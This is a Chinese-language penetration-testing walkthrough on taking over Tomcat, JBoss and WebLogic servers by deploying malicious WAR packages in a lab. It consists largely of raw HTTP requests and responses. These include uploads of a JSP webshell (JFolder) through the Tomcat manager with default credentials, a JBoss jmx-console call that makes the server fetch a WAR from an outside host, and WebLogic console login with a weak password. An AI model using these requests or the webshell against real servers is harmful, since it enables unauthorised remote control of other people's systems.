简介
远程部署漏洞属于服务器、中间件配置问题,攻击者可通过远程部署漏洞获取系统权限,远程部署漏洞经常出现在Tomcat、Jboss、Weblogic等web容器之上。
tomcat部署war包
http://192.168.52.128:8080/manager/html
tomcat/tomcat
POST /manager/html/upload;jsessionid=A0F8351E37AA865DDFC5EC921BFB4F9A?org.apache.catalina.filters.CSRF_NONCE=7C49D0AF0355D531EAB7DFE30F00FFA1 HTTP/1.1
Host: 192.168.52.128:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:8080/manager/html
Cookie: JSESSIONID=A0F8351E37AA865DDFC5EC921BFB4F9A
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------32062524929426
Content-Length: 31723
-----------------------------32062524929426
Content-Disposition: form-data; name="deployWar"; filename="test3693.war"
Content-Type: application/octet-stream
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<session-config>
<session-timeout>
30
</session-timeout>
</session-config>
<welcome-file-list>
<welcome-file>
index.jsp
</welcome-file>
</welcome-file-list>
</web-app>
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\')
{
sb.append("\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&";
else if (i == '<') return "<";
else if (i == '>') return ">";
else if (i == '"') return """;
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
-----------------------------32062524929426--
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=19B04531B519E953AAD3E2200F9F3D84; Path=/manager; HttpOnly
Content-Type: text/html;charset=utf-8
Date: Mon, 22 Feb 2021 05:02:48 GMT
Connection: close
Content-Length: 19860
<html>
<head>
<style>
<body bgcolor="#FFFFFF">
<table cellspacing="4" border="0">
<tr>
<td colspan="2">
<a href="http://tomcat.apache.org/">
<img border="0" alt="The Tomcat Servlet/JSP Container"
align="left" src="/manager/images/tomcat.gif">
</a>
<a href="http://www.apache.org/">
<img border="0" alt="The Apache Software Foundation" align="right"
src="/manager/images/asf-logo.svg" style=" 266px; height: 83px;">
</a>
</td>
</tr>
</table>
<hr size="1" noshade="noshade">
<table cellspacing="4" border="0">
<tr>
<td class="page-title" bordercolor="#000000" align="left" nowrap>
<font size="+2">Tomcat Web Application Manager</font>
</td>
</tr>
</table>
<br>
çÂĹĄÄşÂĹĽÄşÂÂÄşÂÂÄşÂÂĺżĹçÂÂÄÂÂäżĹ夝
ćĺé¨ç˝˛ĺĺşĺŚä¸ďź
FAIL - War file "test3693.war" already exists on server
http://192.168.52.128:8080/test3693/
Jboss远程部署war包
http://192.168.52.128/jmx-console/
POST /jmx-console/HtmlAdaptor HTTP/1.1
Host: 192.168.52.120
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://192.168.52.128
Connection: close
Referer: http://192.168.52.128/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL
Cookie: PHPSESSID=ft4551u5ag2pu53sf5n4mgfqr0; immortal_png=undefined; immortal_etag=undefined; immortal_cache=undefined; md=nilihQQQmUvSPuXD1pm61Hk6EMV3222QLOzt4QJQaE8qzwt0lfxNnhjruFVW7odj; JSESSIONID=678AC48E10C635F07B63DEBEAE69ECD6
Upgrade-Insecure-Requests: 1
action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=7&arg0=http%3A%2F%2Fpayload.com%2Ftest.war
weblogic部署war包
http://192.168.52.128:7001/console/login/LoginForm.jsp
weblogic:Oracle@123
weblogic常用弱口令: http://cirt.net/passwords?criteria=weblogic
GET /console/login/LoginForm.jsp HTTP/1.1
Host: 192.168.52.128:7001
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:7001/console/login/LoginForm.jsp
Cookie: ADMINCONSOLESESSION=KWbTgzHTnd8sQS7lyhQ1NfjvynrllJtxLZ92R2RtTW9qnvnJNfg1!-1106686951
Connection: close
Cache-Control: max-age=0
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Mon, 22 Feb 2021 05:56:57 GMT
Pragma: no-cache
Content-Length: 3162
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" >
<title>Oracle WebLogic Server Administration Console</title>
<link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/general.css" >
<link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/window.css" >
<link rel="stylesheet" type="text/css" href="/console/css/login.css" >
<script type="text/javascript">
// Disable frame hijacking
if (top != self) top.location.href = location.href;
</script>
<style type="text/css">
html {
background-color: #185E87;
}
</style>
</head>
<body onload="document.loginData.j_username.focus();">
<div id="top">
<div id="login-header">
<div id="logo">
<img src="/console/framework/skins/wlsconsole/images/Branding_Login_WeblogicConsole.gif" alt="Oracle WebLogic Server Administration Console ">
</div>
</div>
<div id="content">
<div id="sidebar">
<img src="/console/framework/skins/wlsconsole/images/Login_11gLogo1.gif" alt="">
</div>
<div id="login">
<div id="title">
Welcome
</div>
<div id="login-form">
<form id="loginData" name="loginData" method="post" action="/console/j_security_check">
<div class="message-row">
<noscript><p class="loginFailed">JavaScript is required. Enable JavaScript to use WebLogic Administration Console.</p></noscript>
<p>Log in to work with the WebLogic Server domain</p>
</div>
<div class="input-row">
<label for="j_username">
Username:</label>
<span class="ctrl">
<input class="textinput" type="text" autocomplete="on" name="j_username" id="j_username">
</span>
</div>
<div class="input-row">
<label for="j_password">
Password:</label>
<span class="ctrl">
<input class="textinput" type="password" autocomplete="on" name="j_password" id="j_password">
</span>
</div>
<div class="button-row">
<span class="ctrl">
<input class="formButton" type="submit"
onclick="form.submit();this.disabled=true;document.body.style.cursor = 'wait'; this.className='formButton-disabled';"
value='Login'>
</span>
<input type="hidden" name="j_character_encoding" value="UTF-8">
</div>
</form>
</div>
</div>
</div>
<div id="info">
</div>
</div>
<div class="login-footer">
<div class="info">
<p id="footerVersion">WebLogic Server Version: 10.3.6.0</p>
<p id="copyright">Copyright © 1996, 2011, Oracle and/or its affiliates. All rights reserved.</p>
<p id="trademark">Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.</p>
</div>
</div>
</body>
</html>
登录成功后调整到如下地址:
http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1
后台上传webshell
获取到管理员密码后,登录后台。点击左侧的部署,可见一个应用列表:
点击部署的数据包如下:
GET /console/console.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage HTTP/1.1
Host: 192.168.52.128:7001
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1
Cookie: ADMINCONSOLESESSION=KWbTgzHTnd8sQS7lyhQ1NfjvynrllJtxLZ92R2RtTW9qnvnJNfg1!-1106686951; JSESSIONID=QrzGgzJTYv0TVjxk1Vl2zmcrX4n1Gg25SDWNLvJdfJkbzrRCvK7l!-1106686951
Connection: close
HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Connection: close
Date: Mon, 22 Feb 2021 06:08:41 GMT
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 43772
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Script-Type" content="text/javascript"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Summary of Deployments - base_domain - WLS Console</title><link rel="stylesheet" type="text/css" href="/console/framework/skeletons/wlsconsole/css/layout.css"><script src="/console/framework/skeletons/wlsconsole/js/buttons.js" type="text/javascript"></script><script src="/console/framework/skeletons/wlsconsole/js/util.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/general.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/menu.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/window.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/console.css"><link rel="stylesheet" type="text/css" href="/console/css/content.css"><script src="/console/javascript/consoleUtil.js" type="text/javascript"></script><script src="/console/javascript/console-help.js" type="text/javascript"></script><script src="/console/javascript/recorder.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/changemgmt.css"><link rel="stylesheet" type="text/css" href="/console/css/forms.css"><script src="/console/javascript/changemgmt.js" type="text/javascript"></script><script src="/console/javascript/form.js" type="text/javascript"></script><script src="/console/javascript/PredicateEditor.js" type="text/javascript"></script><script src="/console/javascript/table.js" type="text/javascript"></script><script src="/console/javascript/portletrefresh.js" type="text/javascript"></script><script src="/console/javascript/ButtonMenu.js" type="text/javascript"></script><script src="/console/javascript/chooser.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/navtree.css"><script src="/console/javascript/tree.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/quicklinks.css"><link rel="stylesheet" type="text/css" href="/console/css/systemstatus.css"></head><body><div class="wlsc-header"><div id="console-header-logo"><a href="#repetitive_links"><img src="images/spacer.gif" alt="Skip repetitive links "></a><div><a href="http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1" title="WebLogic Server Administration Console Home"><img src="framework/skins/wlsconsole/images/Branding_WeblogicConsole.gif" id="console-title" alt="WebLogic Server Administration Console Home "></a></div></div><div id="global-links"><span id="pageStatus"><img src="framework/skins/wlsconsole/images/pageIdle.gif" id="pageIdle" title="Idle" alt="Idle"><img src="framework/skins/wlsconsole/images/pageBusy.gif" id="pageBusy" title="Busy" alt="Busy"></span></div><div id="header-trans"><img src="framework/skins/wlsconsole/images/gradient-white-none.png" alt=""></div></div><div id="Home" class="wlsc-book"><div class="wlsc-book-content"><div id="page" class="wlsc-page"><div class="wlsc-2col-layout"><div id="console-content-col"><div id="console-content-col-inner"><div id="ToolbarBook" class="none"><div class="wlsc-book-content"><div id="ToolbarPage" class="wlsc-page"><div id="portlet_toolbar" class="wlsc-window "><div class="wlsc-window-content">
点击安装,选择“上载文件”:
选择需要上载的本地war包
上传的数据包
POST /console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/uploadApp HTTP/1.1
Host: 192.168.52.128:7001
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:7001/console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/selectUploadApp
Cookie: ADMINCONSOLESESSION=KWbTgzHTnd8sQS7lyhQ1NfjvynrllJtxLZ92R2RtTW9qnvnJNfg1!-1106686951; JSESSIONID=QrzGgzJTYv0TVjxk1Vl2zmcrX4n1Gg25SDWNLvJdfJkbzrRCvK7l!-1106686951
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------8434166712903
Content-Length: 32108
-----------------------------8434166712903
Content-Disposition: form-data; name="AppApplicationInstallPortletuploadAppPath"; filename="test3693.war"
Content-Type: application/octet-stream
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<session-config>
<session-timeout>
30
</session-timeout>
</session-config>
<welcome-file-list>
<welcome-file>
index.jsp
</welcome-file>
</welcome-file-list>
</web-app>
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0; //语言版本,0 : 中文; 1:英文
String strThisFile="JFolder.jsp";
String[] authorInfo={" <font color=red> 写的不好,将就着用吧 - - by 慈勤强 http://www.topronet.com </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
String[] strFileManage = {"文 件 管 理","File Management"};
String[] strCommand = {"CMD 命 令","Command Window"};
String[] strSysProperty = {"系 统 属 性","System Property"};
String[] strHelp = {"帮 助","Help"};
String[] strParentFolder = {"上级目录","Parent Folder"};
String[] strCurrentFolder= {"当前目录","Current Folder"};
String[] strDrivers = {"驱动器","Drivers"};
String[] strFileName = {"文件名称","File Name"};
String[] strFileSize = {"文件大小","File Size"};
String[] strLastModified = {"最后修改","Last Modified"};
String[] strFileOperation= {"文件操作","Operations"};
String[] strFileEdit = {"修改","Edit"};
String[] strFileDown = {"下载","Download"};
String[] strFileCopy = {"复制","Move"};
String[] strFileDel = {"删除","Delete"};
String[] strExecute = {"执行","Execute"};
String[] strBack = {"返回","Back"};
String[] strFileSave = {"保存","Save"};
-----------------------------8434166712903
Content-Disposition: form-data; name="AppApplicationInstallPortletuploadPlanPath"; filename=""
Content-Type: application/octet-stream
-----------------------------8434166712903
Content-Disposition: form-data; name="AppApplicationInstallPortletfrsc"
0x062430ecab863931868d682e81a64437e4490c23def60129
-----------------------------8434166712903--
HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Connection: close
Date: Mon, 22 Feb 2021 06:20:53 GMT
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 37476
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Script-Type" content="text/javascript"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Install Application Assistant - base_domain - WLS Console</title><link rel="stylesheet" type="text/css" href="/console/framework/skeletons/wlsconsole/css/layout.css"><script src="/console/framework/skeletons/wlsconsole/js/buttons.js" type="text/javascript"></script><script src="/console/framework/skeletons/wlsconsole/js/util.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/general.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/menu.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/window.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/console.css"><link rel="stylesheet" type="text/css" href="/console/css/content.css"><script src="/console/javascript/consoleUtil.js" type="text/javascript"></script><script src="/console/javascript/console-help.js" type="text/javascript"></script><script src="/console/javascript/recorder.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/changemgmt.css"><link rel="stylesheet" type="text/css" href="/console/css/forms.css"><script src="/console/javascript/changemgmt.js" type="text/javascript"></script><script src="/console/javascript/form.js" type="text/javascript"></script><script src="/console/javascript/PredicateEditor.js" type="text/javascript"></script><script src="/console/javascript/table.js" type="text/javascript"></script><script src="/console/javascript/portletrefresh.js" type="text/javascript"></script><script src="/console/javascript/ButtonMenu.js" type="text/javascript"></script><script src="/console/javascript/chooser.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/navtree.css"><script src="/console/javascript/tree.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/quicklinks.css"><link rel="stylesheet" type="text/css" href="/console/css/systemstatus.css"></head><body><div class="wlsc-header"><div id="console-header-logo"><a href="#repetitive_links"><img src="images/spacer.gif" alt="Skip repetitive links "></a><div><a href="http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1" title="WebLogic Server Administration Console Home"><img src="framework/skins/wlsconsole/images/Branding_WeblogicConsole.gif" id="console-title" alt="WebLogic Server Administration Console Home "></a></div></div><div id="global-links"><span id="pageStatus"><img src="framework/skins/wlsconsole/images/pageIdle.gif" id="pageIdle" title="Idle" alt="Idle"><img src="framework/skins/wlsconsole/images/pageBusy.gif" id="pageBusy" title="Busy" alt="Busy"></span></div><div id="header-trans"><img src="framework/skins/wlsconsole/images/gradient-white-none.png" alt=""></div></div><div id="Home" class="wlsc-book"><div class="wlsc-book-content"><div id="page" class="wlsc-page"><div class="wlsc-2col-layout"><div id="console-content-col"><div id="console-content-col-inner"><div id="ToolbarBook" class="none"><div class="wlsc-book-content"><div id="ToolbarPage" class="wlsc-page"><div id="portlet_toolbar" class="wlsc-window "><div class="wlsc-window-content">
后面基本就是一路Next,详细的操作参考:https://www.cnblogs.com/DFX339/p/8515200.html
部署完成
开始配置系统环境
http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=CoreServerServerTablePage
选择协议,然后选择HTTP
再次点击部署(Deployments)
http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage
然后就可以访问项目了 http://IP:PORT/ProjectName